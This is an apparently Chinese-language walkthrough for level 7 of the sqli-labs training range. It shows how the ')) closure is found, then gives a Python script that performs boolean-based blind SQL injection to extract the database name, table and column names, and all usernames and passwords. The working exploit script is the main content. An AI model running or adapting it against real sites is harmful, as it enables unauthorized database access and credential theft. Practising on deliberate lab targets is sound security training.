sqli-labs靶场第七关

7、第七关

id=1' --+单引号报错,id=1" --+双引号不报错,可以判断是单引号闭合

id=1') --+也报错，尝试两个括号闭合，id=1')) --+不报错

接下来用脚本爆库

import string

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ['~', "@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = False
    url = "http://sqli.labs/Less-7/?id=1%27))%20"
    if test:
        print("test")
        res = requests.get(url + "and%20length(database())>10%20--+")
        content_length = len(res.text)
        print(content_length)
    else:
        content_len = 691
        list1 = numbers + letters2 + fuhao
        print(len(list1))
        len1 = 20
        # 获取数据库名长度
        db_length = 0
        for i in range(50):
            url_db = url + f"and%20length(database())={i}%20--+"
            res = requests.get(url_db)
            if "You are in.... Use outfile......" in res.text:
                db_length = i
                break
        print(f"数据库名长度:{db_length}")
        # 获取数据库名
        database = ""
        for p in range(db_length + 1):
            for a in list1:
                url_db = url + f"and%20substr(database(),{p},1)=%22{a}%22%20--+"
                res = requests.get(url_db)
                if "You are in.... Use outfile......" in res.text:
                    database = f"{database}{a}"
                    print(a, end='')
        print(f",数据库:{database}")
        # 获取所有表名
        num = 0
        tables = ""
        for p in range(1000):
            if num > len(list1)*2:
                break
            for a in list1:
                url_db = url + f"and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)=\"{a}\"%20--+"
                res = requests.get(url_db)
                num += 1
                if "You are in.... Use outfile......" in res.text:
                    tables = f"{tables}{a}"
                    print(a, end='')
                    num = 0
        print(f",所有表名:{tables}")
        # 获取users表所有字段
        columns = ""
        num = 0
        for p in range(1000):
            if num > len(list1)*2:
                break
            for a in list1:
                url_db = url + f"and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users'),{p},1)=\"{a}\"%20--+"
                res = requests.get(url_db)
                num += 1
                if "You are in.... Use outfile......" in res.text:
                    columns = f"{columns}{a}"
                    print(a, end='')
                    num = 0
        print(f",所有字段名:{columns}")
        # 获取所有账号
        users = ""
        num = 0
        for p in range(1000):
            if num > len(list1)*2:
                break
            for a in list1:
                url_db = url + f"and%20substr((select group_concat(username,':',password) from users),{p},1)=\"{a}\"%20--+"
                res = requests.get(url_db)
                num += 1
                if "You are in.... Use outfile......" in res.text:
                    users = f"{users}{a}"
                    print(a, end='')
                    num = 0
        print(f",所有用户密码:{users}")